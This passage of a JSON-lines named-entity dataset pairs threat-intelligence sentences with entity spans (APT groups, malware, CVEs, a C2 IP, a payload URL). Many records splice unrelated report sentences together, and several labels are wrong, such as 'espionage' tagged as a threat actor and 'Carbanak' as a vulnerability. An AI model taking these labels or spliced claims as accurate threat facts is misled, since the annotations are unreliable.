Kaspersky found the BlackOasis group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": {"THREAT_ACTOR: SectorJ04": [[78, 87]], "MALWARE: document files": [[180, 194]], "THREAT_ACTOR: attacker": [[262, 270]], "ORGANIZATION: Kaspersky": [[335, 344]], "THREAT_ACTOR: BlackOasis group": [[355, 371]], "TOOL: Adobe Flash Player": [[389, 407]], "VULNERABILITY: zero-day": [[408, 416]], "VULNERABILITY: CVE-2016-4117": [[433, 446]], "MALWARE: FinSpy": [[493, 499]]}, "info": {"id": "cyberner_stix_train_000550", "source": "cyberner_stix_train"}} {"text": "Due to artefacts left in the loader during compilation time however , we know that it used a specific version of the Boost library , 1.54.0 , that was only published on the 1st of July 2013 .", "spans": {"TOOL: Boost": [[117, 122]]}, "info": {"id": "cyberner_stix_train_000551", "source": "cyberner_stix_train"}} {"text": "The application downloads the file and dynamically loads it using dalvik.system.DexClassLoader and invokes class and method specified in json . The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components . 
The threat actor 's known working hours align to Chinese Standard TIME ( CST ) and its targeting corresponds to that of other known China-based threat actors , which supports our assessment that these campaigns are conducted by APT10 .", "spans": {"TOOL: ActiveX control": [[190, 205]], "MALWARE: JavaScript file": [[220, 235]], "VULNERABILITY: CVE-2013-7331": [[347, 360]], "THREAT_ACTOR: actors": [[578, 584]], "THREAT_ACTOR: APT10": [[655, 660]]}, "info": {"id": "cyberner_stix_train_000552", "source": "cyberner_stix_train"}} {"text": "The second stealing function is the onStartCommand , which steals infected device data and additional information . Unfortunately , we do not have access to the PYTHON33.hlp or CreateTsMediaAdm.hlp files , so we do not know the final payload loaded by either of these DLLs . We believe that the Ke3chang attackers are operating out of China and have been active since at least 2010 .", "spans": {"THREAT_ACTOR: Ke3chang": [[295, 303]], "THREAT_ACTOR: attackers": [[304, 313]]}, "info": {"id": "cyberner_stix_train_000553", "source": "cyberner_stix_train"}} {"text": "What is less common is that the name used for the mutex is often a timestamp .", "spans": {}, "info": {"id": "cyberner_stix_train_000554", "source": "cyberner_stix_train"}} {"text": "SELECTED SAMPLES Package Name SHA-256 Digest com.rabbit.artcamera 18c277c7953983f45f2fe6ab4c7d872b2794c256604e43500045cb2b2084103f org.horoscope.astrology.predict 6f1a1dbeb5b28c80ddc51b77a83c7a27b045309c4f1bff48aaff7d79dfd4eb26 com.theforest.rotatemarswallpaper 4e78a26832a0d471922eb61231bc498463337fed8874db5f70b17dd06dcb9f09 Binders are delivered by attack vectors ( such as phishing and watering hole attacks ) onto a machine . The most common ports used are , 80, 1985, 1986, and 443 . 1985 is the default port for the malware , 1986 is the lazy variation of that port . 
For this year 's State of Malware report we asked : What do resource constrained organizations need to know in 2023 ?", "spans": {"TOOL: Binders": [[327, 334]], "ORGANIZATION: organizations": [[656, 669]]}, "info": {"id": "cyberner_stix_train_000555", "source": "cyberner_stix_train"}} {"text": "Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download . Usually , the delivered payload is either the well-known ' PlugX ' or ' HTTPBrowser ' RAT , a tool which is believed to have Chinese origins and to be used only by certain Chinese hacking groups .", "spans": {"VULNERABILITY: CVE-2017-1099": [[71, 84]], "MALWARE: RTF attachments": [[100, 115]], "MALWARE: PlugX": [[186, 191]], "MALWARE: HTTPBrowser": [[199, 210]], "MALWARE: RAT": [[213, 216]]}, "info": {"id": "cyberner_stix_train_000556", "source": "cyberner_stix_train"}} {"text": "Additionally , should the command-and-control ( C & C ) servers get seized by the authorities , it would ultimately lead to disclosing information about the entire botnet . In total , Scattered Canary received more than 3 , 000 account credentials as a result of their phishing attacks . 
Considering that the afterhack publications by the media mentioned that the investigation stumbled upon three different attackers , it was not obvious whether Lazarus was the one responsible for the fraudulent SWIFT transactions , or if Lazarus had in fact developed its own malware to attack banks ' systems .", "spans": {"THREAT_ACTOR: Scattered Canary": [[184, 200]], "VULNERABILITY: phishing": [[269, 277]], "ORGANIZATION: media": [[339, 344]], "THREAT_ACTOR: attackers": [[408, 417]], "THREAT_ACTOR: Lazarus": [[447, 454], [525, 532]], "ORGANIZATION: banks": [[581, 586]]}, "info": {"id": "cyberner_stix_train_000557", "source": "cyberner_stix_train"}} {"text": "All included decoy document written in Arabic ( all related to Middle Eastern politics ) or Hebrew .", "spans": {"TOOL: decoy document": [[13, 27]]}, "info": {"id": "cyberner_stix_train_000558", "source": "cyberner_stix_train"}} {"text": "During this period of transition , CosmicDuke would often embed PinchDuke so that , upon execution , CosmicDuke would write to disk and execute PinchDuke .", "spans": {"MALWARE: CosmicDuke": [[35, 45], [101, 111]], "MALWARE: PinchDuke": [[64, 73], [144, 153]]}, "info": {"id": "cyberner_stix_train_000559", "source": "cyberner_stix_train"}} {"text": "It also starts an Android service named MainService . Gaza Cybergang Group3 (highest sophistication) whose activities previously went by the name Operation Parliament . 
Use of these protocols is thoroughly documented in the Novetta and Kaspersky reports .", "spans": {"SYSTEM: Android": [[18, 25]], "THREAT_ACTOR: Gaza Cybergang Group3": [[54, 75]], "ORGANIZATION: Novetta": [[224, 231]], "ORGANIZATION: Kaspersky": [[236, 245]]}, "info": {"id": "cyberner_stix_train_000560", "source": "cyberner_stix_train"}} {"text": "Typically , their primary goal is to obtain domain administrator credentials and/or gain access to a system storing intellectual property .", "spans": {}, "info": {"id": "cyberner_stix_train_000561", "source": "cyberner_stix_train"}} {"text": "\" This malware employs several tactics to keep its activity hidden , meaning users might be unaware of its existence on their device . While the tools profiled in this report are not inherently malicious , their capabilities are nonetheless integral to the Lazarus Group 's cyber operations , both espionage and destructive in nature , making them inherently dangerous to potential victims . Elfin has deployed a wide range of tools in its attacks including custom malware , commodity malware , and open-source hacking tools . 
A careful analysis of the domain registrations from this threat actor between 2014 and 2015 allowed us to identify one profile used to register several domains that were used as C&C servers for a particular malware family employed by the Winnti group .", "spans": {"THREAT_ACTOR: Lazarus Group": [[257, 270]], "THREAT_ACTOR: espionage": [[298, 307]], "THREAT_ACTOR: Elfin": [[392, 397]]}, "info": {"id": "cyberner_stix_train_000562", "source": "cyberner_stix_train"}} {"text": "The target 's job function , corporate email address , information on work related projects , and publicly accessible personal blog could all be freely found online .", "spans": {"TOOL: email": [[39, 44]]}, "info": {"id": "cyberner_stix_train_000563", "source": "cyberner_stix_train"}} {"text": "RIPPER interacts with the ATM by inserting a specially manufactured ATM card with an EMV chip that serves as the authentication mechanism . We suspect the Kazuar tool may be linked to the Turla threat actor group ( also known as Uroburos and Snake ) , who have been reported to have compromised embassies , defense contractors , educational institutions , and research organizations across the globe .", "spans": {"MALWARE: RIPPER": [[0, 6]], "MALWARE: Kazuar tool": [[155, 166]], "THREAT_ACTOR: Turla": [[188, 193]], "THREAT_ACTOR: Uroburos": [[229, 237]], "THREAT_ACTOR: Snake": [[242, 247]], "ORGANIZATION: embassies": [[295, 304]], "ORGANIZATION: defense contractors": [[307, 326]], "ORGANIZATION: educational institutions": [[329, 353]], "ORGANIZATION: research organizations": [[360, 382]]}, "info": {"id": "cyberner_stix_train_000564", "source": "cyberner_stix_train"}} {"text": "The new SOL protocol within the PLATINUM file-transfer tool makes use of the AMT Technology SDK 's Redirection Library API ( imrsdk.dll ) . 
To mitigate the threat of the described campaign , security teams can consider blocking access to the C2 server 103.236.150.14 and , where applicable , ensure that the Microsoft Security Update KB2553204 is installed in order to patch the CVE-2017-11882 vulnerability .", "spans": {"THREAT_ACTOR: PLATINUM": [[32, 40]], "TOOL: AMT Technology SDK": [[77, 95]], "TOOL: Redirection Library API": [[99, 122]], "MALWARE: imrsdk.dll": [[125, 135]], "TOOL: C2": [[242, 244]], "ORGANIZATION: Microsoft": [[308, 317]], "VULNERABILITY: CVE-2017-11882": [[379, 393]]}, "info": {"id": "cyberner_stix_train_000565", "source": "cyberner_stix_train"}} {"text": "Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 . TG-3390 actors have used Java exploits in their SWCs .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]], "VULNERABILITY: Microsoft Office exploits": [[37, 62]], "MALWARE: Exploit.MSWord.CVE-2010-333": [[110, 137]], "MALWARE: Exploit.Win32.CVE-2012-0158": [[140, 167]], "THREAT_ACTOR: TG-3390": [[170, 177]], "TOOL: Java": [[195, 199]], "MALWARE: SWCs": [[218, 222]]}, "info": {"id": "cyberner_stix_train_000566", "source": "cyberner_stix_train"}} {"text": "this instance ) from the launcher view on their device , as shown in Figure 3 below . Targeted telecom companies spanned several countries , and recently identified intrusions were concentrated in countries where we had not identified any prior APT41 activity . 
CTU researchers assess with moderate confidence that the group is operating from the Russian Federation and is gathering intelligence on behalf of the Russian government .", "spans": {"ORGANIZATION: telecom companies": [[95, 112]], "THREAT_ACTOR: APT41": [[245, 250]], "ORGANIZATION: CTU": [[262, 265]], "ORGANIZATION: Russian government": [[413, 431]]}, "info": {"id": "cyberner_stix_train_000567", "source": "cyberner_stix_train"}} {"text": "However , the security of these stores and the apps they sell aren ’ t always verified . As detailed in the DOJ complaint , a sample of WHITEOUT ( aka Contopee ) malware we attribute to APT38 was used between 2015 and 2016 against a Southeast Asian bank . is always even . The executable within this not only played a very funny video , but dropped and ran another CozyDuke executable .", "spans": {"TOOL: WHITEOUT": [[136, 144]], "TOOL: Contopee": [[151, 159]], "THREAT_ACTOR: APT38": [[186, 191]], "ORGANIZATION: bank": [[249, 253]]}, "info": {"id": "cyberner_stix_train_000568", "source": "cyberner_stix_train"}} {"text": "Figure 4 . In addition , Emissary appears to against Taiwan or Hong Kong , all of the decoys are written in Traditional Chinese , and they use themes related to the government or military . ESET telemetry shows victims are mostly located in Asia , with Thailand having the largest part of the pie . 
Depending on the platform and on how the code is compiled , these vulnerabilities could lead to arbitrary code execution : Talos is disclosing these vulnerabilities despite no official fix from Open Babel .", "spans": {"TOOL: Emissary": [[25, 33]], "ORGANIZATION: government": [[165, 175]], "ORGANIZATION: military": [[179, 187]], "ORGANIZATION: ESET": [[190, 194]], "ORGANIZATION: Talos": [[422, 427]], "ORGANIZATION: Open Babel": [[493, 503]]}, "info": {"id": "cyberner_stix_train_000569", "source": "cyberner_stix_train"}} {"text": "] net The overlaps between the Henbox , PlugX , Zupdax , and Poison Ivy malware families involves a web of shared C2s and IP resolutions centered around the below : 59.188.196 [ . APT41 has also been observed modifying firewall rules to enable file and printer sharing to allow for inbound Server Message Block (SMB) traffic . In the latter case however , the Dukes group appear to have also simultaneously developed an entirely new loader , which we first observed being used in conjunction with CosmicDuke during the spring of 2015 .", "spans": {"MALWARE: Henbox": [[31, 37]], "MALWARE: PlugX": [[40, 45]], "MALWARE: Zupdax": [[48, 54]], "MALWARE: Poison Ivy": [[61, 71]], "THREAT_ACTOR: APT41": [[180, 185]], "THREAT_ACTOR: Dukes group": [[360, 371]], "MALWARE: CosmicDuke": [[497, 507]]}, "info": {"id": "cyberner_stix_train_000570", "source": "cyberner_stix_train"}} {"text": "In addition , Dell analysts have assessed with high-confidence these activities are attributable to Iranian state-sponsored activities .", "spans": {"ORGANIZATION: Dell": [[14, 18]]}, "info": {"id": "cyberner_stix_train_000571", "source": "cyberner_stix_train"}} {"text": "The stealer searches for files 60mb and less with these extensions : .doc , .docx , .xls , .xlsx , .ppt , .pptx , .exe , .zip , .rar .", "spans": {"FILEPATH: .doc": [[69, 73]], "FILEPATH: .docx": [[76, 81]], "FILEPATH: .xls": [[84, 88]], "FILEPATH: .xlsx": [[91, 96]], "FILEPATH: .ppt": [[99, 103]], 
"FILEPATH: .pptx": [[106, 111]], "FILEPATH: .exe": [[114, 118]], "FILEPATH: .zip": [[121, 125]], "FILEPATH: .rar": [[128, 132]]}, "info": {"id": "cyberner_stix_train_000572", "source": "cyberner_stix_train"}} {"text": "We needed to do this to understand the techniques FinFisher uses to compromise and persist on a machine , and to validate the effectiveness of Office 365 ATP detonation sandbox , Windows Defender Advanced Threat Protection ( Windows Defender ATP ) generic detections , and other Microsoft security solutions . APT40 has been observed leveraging a variety of techniques for initial compromise , including web server exploitation , phishing campaigns delivering publicly available and custom backdoors , and strategic web compromises . The data is XOR encrypted with the key “ *&b0i0rong2Y7un1 ” and base64-encoded . In each case , CrowdStrike reviewed the relevant logs and determined there was no evidence of exploitation of CVE-2022 - 41040 for initial access .", "spans": {"MALWARE: FinFisher": [[50, 59]], "SYSTEM: Office 365 ATP": [[143, 157]], "SYSTEM: Windows Defender Advanced Threat Protection": [[179, 222]], "SYSTEM: Windows Defender ATP": [[225, 245]], "ORGANIZATION: Microsoft": [[279, 288]], "THREAT_ACTOR: APT40": [[310, 315]], "TOOL: XOR": [[546, 549]], "ORGANIZATION: CrowdStrike": [[630, 641]], "VULNERABILITY: CVE-2022 - 41040": [[725, 741]]}, "info": {"id": "cyberner_stix_train_000573", "source": "cyberner_stix_train"}} {"text": "But some clues , such as the existence of a hidden menu for operator control , point to a manual installation method – the attackers used physical access to a victim ’ s device to install the malware . According to trusted third-party reporting , HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace , telecommunications , and finance industries . Later at 20:57 , the attackers became active on the compromised machine and proceeded to download the archiving tool WinRAR . 
89.34.237.118 808 http://89.34.237.118:808/Rar32.exe . Based on the use of domain names they registered , the group started out in the business of fake / rogue anti - virus products in 2007 .", "spans": {"THREAT_ACTOR: HIDDEN COBRA actors": [[247, 266]], "TOOL: FALLCHILL malware": [[290, 307]], "ORGANIZATION: aerospace": [[333, 342]], "ORGANIZATION: telecommunications": [[345, 363]], "ORGANIZATION: finance industries": [[370, 388]], "TOOL: WinRAR": [[508, 514]], "IP_ADDRESS: 89.34.237.118 808": [[517, 534]], "URL: http://89.34.237.118:808/Rar32.exe": [[535, 569]], "MALWARE: fake / rogue anti - virus products": [[664, 698]]}, "info": {"id": "cyberner_stix_train_000574", "source": "cyberner_stix_train"}} {"text": "Infecting legal web resources help spread mobile malware via popular websites . For example , at the end of 2016 CTU researchers observed the threat actors using native system functionality to disable logging processes and delete logs within a network . Furthermore , the encrypted payload is neither embedded in the overlay nor located in a COM1:NULL.dat alternate data stream . 
If implemented correctly , PIEHOP can connect to a user supplied remote MSSQL server for uploading LIGHTWORK and issuing remote commands specifically targeting RTU , and then delete itself .", "spans": {"ORGANIZATION: CTU": [[113, 116]], "TOOL: PIEHOP": [[407, 413]]}, "info": {"id": "cyberner_stix_train_000575", "source": "cyberner_stix_train"}} {"text": "Ultimately , the epistemic foundation of the behavior-based naming approach makes this irrelevant for tracking ( and labeling for convenience sake ) observations .", "spans": {}, "info": {"id": "cyberner_stix_train_000576", "source": "cyberner_stix_train"}} {"text": "OCTOBER 2014 THROUGH SEPTEMBER 2015 , FireEye iSight Intelligence identified changes made to domain name server ( DNS ) records that suggest that APT28 intercepted email traffic from the Kyrgyzstan Ministry of Foreign Affairs after maliciously modifying DNS records of the ministry ’s authoritative DNS servers .", "spans": {"ORGANIZATION: FireEye": [[38, 45]], "THREAT_ACTOR: APT28": [[146, 151]], "TOOL: email": [[164, 169]], "ORGANIZATION: Kyrgyzstan Ministry of Foreign Affairs": [[187, 225]]}, "info": {"id": "cyberner_stix_train_000577", "source": "cyberner_stix_train"}} {"text": "PVE Find AD User — This command-line tool identifies login locations of Active Directory ( AD ) users .", "spans": {"TOOL: PVE Find AD User": [[0, 16]], "TOOL: Active Directory": [[72, 88]], "TOOL: AD": [[91, 93]]}, "info": {"id": "cyberner_stix_train_000578", "source": "cyberner_stix_train"}} {"text": "All of these methods attempt to space out the introduction of possible signals in various stages , testing for gaps in the publication process . 
Once the Barium Defendants have access to a victim computer through the malware described above , they monitor the victim 's activity and ultimately search for and steal sensitive documents ( for example , exfiltration of intellectual property regarding technology has been seen ) , and personal information fi\"om the victim 's network . Sending the help command for each , you can see the extra features added between version 3.1 and 3.2 . The “ ExecStart ” value specifies the path of the program to be run , which in this case was GOGETTER .", "spans": {"ORGANIZATION: technology": [[399, 409]], "TOOL: GOGETTER": [[679, 687]]}, "info": {"id": "cyberner_stix_train_000579", "source": "cyberner_stix_train"}} {"text": "If the malware determines that is not running on an emulator , it then performs additional checks to ensure that it wo n't be detected . We observed Moafee running HTRAN proxies on their multiple Command and Control ( C2 ) servers – all operated on CHINANET , and hosted in Guangdong Province . ShadowHammer : HEUR : Trojan.Win32.ShadowHammer.gen . The first step is the previously unknown OWA exploit technique .", "spans": {"THREAT_ACTOR: Moafee": [[149, 155]], "TOOL: HTRAN": [[164, 169]], "THREAT_ACTOR: ShadowHammer": [[295, 307]], "MALWARE: HEUR": [[310, 314]], "MALWARE: Trojan.Win32.ShadowHammer.gen": [[317, 346]]}, "info": {"id": "cyberner_stix_train_000580", "source": "cyberner_stix_train"}} {"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . 
specifically CVE-2018-0798 , before downloading subsequent payloads .", "spans": {"VULNERABILITY: Carbanak": [[20, 28]], "THREAT_ACTOR: criminals": [[95, 104]], "ORGANIZATION: financial industry": [[145, 163]], "VULNERABILITY: CVE-2018-0798": [[212, 225]]}, "info": {"id": "cyberner_stix_train_000581", "source": "cyberner_stix_train"}} {"text": "This recurring , blindingly-fast Sofacy attack attracted our attention as neither sample was delivered through a zero-day vulnerability — instead , they appeared to be downloaded and installed by another malware .", "spans": {"THREAT_ACTOR: Sofacy": [[33, 39]], "VULNERABILITY: zero-day": [[113, 121]]}, "info": {"id": "cyberner_stix_train_000582", "source": "cyberner_stix_train"}} {"text": "On installation , the app requests the user to provide SMS storage access and high Android privileges such as Device Admin . Shrouded Crossbow targeted privatized agencies and government contractors as well as enterprises in the consumer electronics , computer , healthcare , and financial industries . So much so that Microsoft did a takedown in 2012 . It is therefore recommended to set the code only as a response for or methods and to use instead , as the method change is explicitly prohibited in that case .", "spans": {"SYSTEM: Android": [[83, 90]], "ORGANIZATION: privatized agencies": [[152, 171]], "ORGANIZATION: government contractors": [[176, 198]], "ORGANIZATION: enterprises": [[210, 221]], "ORGANIZATION: consumer electronics": [[229, 249]], "ORGANIZATION: computer": [[252, 260]], "ORGANIZATION: healthcare": [[263, 273]], "ORGANIZATION: financial industries": [[280, 300]], "ORGANIZATION: Microsoft": [[319, 328]]}, "info": {"id": "cyberner_stix_train_000583", "source": "cyberner_stix_train"}} {"text": "After installation , the malware connects to the designated Command and Control ( C & C ) server , and receives a command to perform . 
Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data exfiltration and to provide remote access to infected machines . On April 22 , 2015 , Suckfly exploited a vulnerability on the targeted employee 's operating system ( Windows ) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack .", "spans": {"VULNERABILITY: Carbanak": [[135, 143]], "TOOL: Carberp": [[186, 193]], "THREAT_ACTOR: espionage": [[211, 220]], "THREAT_ACTOR: Suckfly": [[314, 321]], "SYSTEM: Windows": [[395, 402]], "MALWARE: Nidiran back door": [[483, 500]]}, "info": {"id": "cyberner_stix_train_000584", "source": "cyberner_stix_train"}} {"text": "Potentially malicious iOS connection Using the codes and “ Concipit1248 ” to check for more versions , we found two other apps in the App Store . It is highly likely that this threat is far more widespread and we urge financial institutions around the world to scan their networks for signs of the Metel malware . the following microcode graph shows edi is assigned to esi ( the block comparison variable in this case ) Rhysida appears to have first popped up back in May , with several high - profile compromises posted on their leak site .", "spans": {"SYSTEM: iOS": [[22, 25]], "SYSTEM: App Store": [[134, 143]], "ORGANIZATION: financial institutions": [[218, 240]], "TOOL: Metel malware": [[298, 311]], "MALWARE: Rhysida": [[420, 427]]}, "info": {"id": "cyberner_stix_train_000585", "source": "cyberner_stix_train"}} {"text": "The packet is serialized into a stream of bytes .", "spans": {}, "info": {"id": "cyberner_stix_train_000586", "source": "cyberner_stix_train"}} {"text": "When analyzing the Ginp ’ s recent samples , ThreatFabric analysts found some similarities with the famous Android banking Trojan . The configuration file then loads the Trochilus payload into memory by injecting it into a valid system process . 
It turned out that the DLL files we found are a custom variant of Gh0st RAT , and the EXE files download the RAT .", "spans": {"MALWARE: Ginp": [[19, 23]], "SYSTEM: ThreatFabric": [[45, 57]], "MALWARE: configuration file": [[136, 154]], "TOOL: DLL": [[269, 272]], "MALWARE: Gh0st RAT": [[312, 321]]}, "info": {"id": "cyberner_stix_train_000587", "source": "cyberner_stix_train"}} {"text": "The certificates are only as secure as the safeguards that organizations put around them .", "spans": {}, "info": {"id": "cyberner_stix_train_000588", "source": "cyberner_stix_train"}} {"text": "Once installed , the application requests permissions so that it may control SMS messages and steal sensitive data on the device , as well as proliferate to other devices in the target device ’ s contact list . These RAT families are discussed in Novetta’s other report on the Lazarus Group’s RAT and Staging capabilities . The fact that Gallmaker appears to rely exclusively on LotL tactics and publicly available hack tools makes its activities extremely hard to detect .", "spans": {"ORGANIZATION: Novetta’s": [[247, 256]], "THREAT_ACTOR: Lazarus": [[277, 284]], "THREAT_ACTOR: Gallmaker": [[338, 347]], "MALWARE: LotL": [[379, 383]], "MALWARE: publicly available hack tools": [[396, 425]]}, "info": {"id": "cyberner_stix_train_000589", "source": "cyberner_stix_train"}} {"text": "( It is specified in the interception template whether a reply must be sent , and which text should be sent to which address . The vulnerability exists in the old Equation Editor ( EQNEDT32.EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas . 
In November 2017 , CTU researchers discovered the North Korean cyber threat group , known as Lazarus Group , had launched a malicious spearphishing campaign using the lure of a job opening for the CFO role at a European-based cryptocurrency company .", "spans": {"TOOL: Equation Editor": [[163, 178]], "MALWARE: EQNEDT32.EXE": [[181, 193]], "ORGANIZATION: CTU": [[309, 312]], "THREAT_ACTOR: Lazarus Group": [[383, 396]], "ORGANIZATION: cryptocurrency company": [[516, 538]]}, "info": {"id": "cyberner_stix_train_000590", "source": "cyberner_stix_train"}} {"text": "Four files tested in 2014 are based on the open-source project , cryptcat .", "spans": {}, "info": {"id": "cyberner_stix_train_000591", "source": "cyberner_stix_train"}} {"text": "Release_Time : 2015-05-28", "spans": {}, "info": {"id": "cyberner_stix_train_000592", "source": "cyberner_stix_train"}} {"text": "Apps that have this permission can draw a window that belongs to the system group and can ’ t be dismissed . Beginning in early March 2018 , Unit 42 started observing Gorgon group attacks against Russian , Spanish and United States government agencies operating in Pakistan . Additionally there is a known issue with the result ( e.g , the remaining loop or paradoxical decompiled code ) With regards to these similarities , we highlight the following trends which could manifest in future OT malware : •", "spans": {"ORGANIZATION: Unit 42": [[141, 148]], "ORGANIZATION: government agencies": [[232, 251]], "MALWARE: OT malware": [[490, 500]]}, "info": {"id": "cyberner_stix_train_000593", "source": "cyberner_stix_train"}} {"text": "We have also found a Russian-language error message in many PinchDuke samples which translates as , “ There is an error in the module ’s name ! The length of the data section name must be 4 bytes! 
” Additionally , Kaspersky noted that based on the compilation timestamps , the authors of the Duke malware appear to primarily work from Monday to Friday between the times of 6am and 4pm UTC+0 .", "spans": {"MALWARE: PinchDuke": [[60, 69]], "ORGANIZATION: Kaspersky": [[214, 223]], "THREAT_ACTOR: Duke": [[292, 296]]}, "info": {"id": "cyberner_stix_train_000594", "source": "cyberner_stix_train"}} {"text": "Beginning within the data field , all contents of the FLV stream become 0xEE .", "spans": {"TOOL: FLV": [[54, 57]]}, "info": {"id": "cyberner_stix_train_000595", "source": "cyberner_stix_train"}} {"text": "To deliver the malware to the victim machines , the Rocke group exploits vulnerabilities in Apache Struts 2 , Oracle WebLogic , and Adobe ColdFusion . While the group used watering hole attacks in 2013 , it's still unclear how victims get redirected to the exploitation kits in the new 2014-2015 attacks .", "spans": {"VULNERABILITY: Rocke group exploits vulnerabilities": [[52, 88]]}, "info": {"id": "cyberner_stix_train_000596", "source": "cyberner_stix_train"}} {"text": "At this stage , half the job is done for the malware . McAfee Advanced Threat Research team 's analysis , we find multiple components from this operation are unique from a code perspective , even though the code is loosely based on previous versions of the SYSCON backdoor . 
, It allows security researchers to analyze the source code and understand the attacker ’s tactics , techniques and procedures ( TTPs ) , which helps security professionals develop effective detection rules and enhance security products ' capabilities in combating ransomware threats .", "spans": {"ORGANIZATION: McAfee Advanced Threat Research": [[55, 86]], "TOOL: SYSCON backdoor": [[257, 272]]}, "info": {"id": "cyberner_stix_train_000597", "source": "cyberner_stix_train"}} {"text": "This organization was formerly known as the East Turkestan Islamic Party and is purported to be an Islamic extremist separatist organization founded by Uyghur jihadists . Learning to access video game production environments enabled APT41 to develop the tactics , techniques , and procedures (TTPs) that were later leveraged against software companies to inject malicious code into software updates . We identified three themes in APT28 's lures and registered domains , which together are particularly relevant to the Russian government .", "spans": {"ORGANIZATION: East Turkestan Islamic Party": [[44, 72]], "THREAT_ACTOR: APT41": [[233, 238]], "THREAT_ACTOR: APT28": [[431, 436]], "ORGANIZATION: Russian government": [[519, 537]]}, "info": {"id": "cyberner_stix_train_000598", "source": "cyberner_stix_train"}} {"text": "The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities . 
The Leafminer operators use EternalBlue to attempt lateral movement within target networks from compromised staging servers .", "spans": {"ORGANIZATION: Unit 42": [[29, 36]], "MALWARE: EPS files": [[109, 118]], "VULNERABILITY: CVE-2015-2545": [[133, 146]], "VULNERABILITY: CVE-2017-0261": [[151, 164]], "THREAT_ACTOR: Leafminer": [[187, 196]], "THREAT_ACTOR: operators": [[197, 206]], "VULNERABILITY: EternalBlue": [[211, 222]]}, "info": {"id": "cyberner_stix_train_000599", "source": "cyberner_stix_train"}} {"text": "OurMine is well known : They hijacked WikiLeaks' DNS last month shortly after they took over HBO 's Twitter account ; last year , they took over Mark Zuckerberg 's Twitter and Pinterest accounts ; and they hit both BuzzFeed and TechCrunch not long after that . The infection vector is a spear-phishing email with a malicious attachment .", "spans": {"THREAT_ACTOR: OurMine": [[0, 7]], "ORGANIZATION: WikiLeaks'": [[38, 48]], "ORGANIZATION: Twitter": [[100, 107], [164, 171]], "ORGANIZATION: Pinterest": [[176, 185]], "ORGANIZATION: BuzzFeed": [[215, 223]], "ORGANIZATION: TechCrunch": [[228, 238]]}, "info": {"id": "cyberner_stix_train_000600", "source": "cyberner_stix_train"}} {"text": "Based on observations associated with the malicious document , we observed subsequent shell sessions probably associated with Metasploit B-MAL S-TOOL ’s Meterpreter that enabled deployment of additional tools and malware preceding deployment of three Shamoon-related files : ntertmgr32.exe , ntertmgr64.exe and vdsk911.sys .", "spans": {"FILEPATH: ntertmgr32.exe": [[275, 289]], "FILEPATH: ntertmgr64.exe": [[292, 306]], "FILEPATH: vdsk911.sys": [[311, 322]]}, "info": {"id": "cyberner_stix_train_000601", "source": "cyberner_stix_train"}} {"text": "Even now , this is still not enough . After the source codes of their tools became public in 2016 , the name Buhtrap was used for the financial Trojan . The unzIP . 
Both of these campaigns use a similar structure with compromised WordPress sites hosting the lure shortcuts and a WebDav server that loads NetSupport RAT .", "spans": {"TOOL: financial Trojan": [[134, 150]], "TOOL: unzIP": [[157, 162]], "SYSTEM: WebDav server": [[279, 292]], "MALWARE: NetSupport RAT": [[304, 318]]}, "info": {"id": "cyberner_stix_train_000602", "source": "cyberner_stix_train"}} {"text": "We are however only aware of one instance - the exploitation of CVE-2013-0640 to deploy MiniDuke - where we believe the exploited vulnerability was a zero-day at the time that the group acquired the exploit .", "spans": {"VULNERABILITY: CVE-2013-0640": [[64, 77]], "MALWARE: MiniDuke": [[88, 96]], "VULNERABILITY: zero-day": [[150, 158]]}, "info": {"id": "cyberner_stix_train_000603", "source": "cyberner_stix_train"}} {"text": "Malware data leak When we analyzed the sample , we realized that the malware operators left the remote database with some of the victims ’ data freely accessible , without any authentication . The comparison of the infection chains reveals in both cases TA505 used a couple of SFX stages to deploy the RMS” software: a legitimate remote administration tool produced by the Russian company TektonIT . When victims open malicious documents attached to the emails , the malware scans for Bitcoin activity and then establishes an implant for long-term data-gathering .", "spans": {"THREAT_ACTOR: TA505": [[254, 259]], "TOOL: emails": [[454, 460]]}, "info": {"id": "cyberner_stix_train_000604", "source": "cyberner_stix_train"}} {"text": "Once the HenBox app is installed and launched , it launches an install process for the embedded app as a decoy to other malicious behaviors occurring in the background , and to satisfy the victim with the app they were requesting , assuming they requested to download a particular app , such as DroidVPN . By 2014 , the Winnti malware code was no longer limited to game manufacturers . 
Between November 26 , 2015 , and December 1 , 2015 , known and suspected China-based APT16 launched several spear phishing attacks targeting Japan and Taiwan in the high-tech , government services , media and financial services industries .", "spans": {"MALWARE: HenBox": [[9, 15]], "SYSTEM: DroidVPN": [[295, 303]], "THREAT_ACTOR: Winnti": [[320, 326]], "ORGANIZATION: game manufacturers": [[365, 383]], "THREAT_ACTOR: APT16": [[471, 476]], "ORGANIZATION: high-tech": [[551, 560]], "ORGANIZATION: government services": [[563, 582]], "ORGANIZATION: media": [[585, 590]], "ORGANIZATION: financial services industries": [[595, 624]]}, "info": {"id": "cyberner_stix_train_000605", "source": "cyberner_stix_train"}} {"text": "After that , it carries out the malware operator ’s commands in order to install the next stage permanent payload .", "spans": {}, "info": {"id": "cyberner_stix_train_000606", "source": "cyberner_stix_train"}} {"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . Threat actors may use the date string hardcoded into each Bookworm sample as a build identifier .", "spans": {"MALWARE: documents": [[12, 21]], "VULNERABILITY: CVE-2017-0199": [[32, 45]], "FILEPATH: date string hardcoded": [[97, 118]], "MALWARE: Bookworm sample": [[129, 144]]}, "info": {"id": "cyberner_stix_train_000607", "source": "cyberner_stix_train"}} {"text": "The Magic Hound attacks did not rely on exploit code to compromise targeted systems , instead 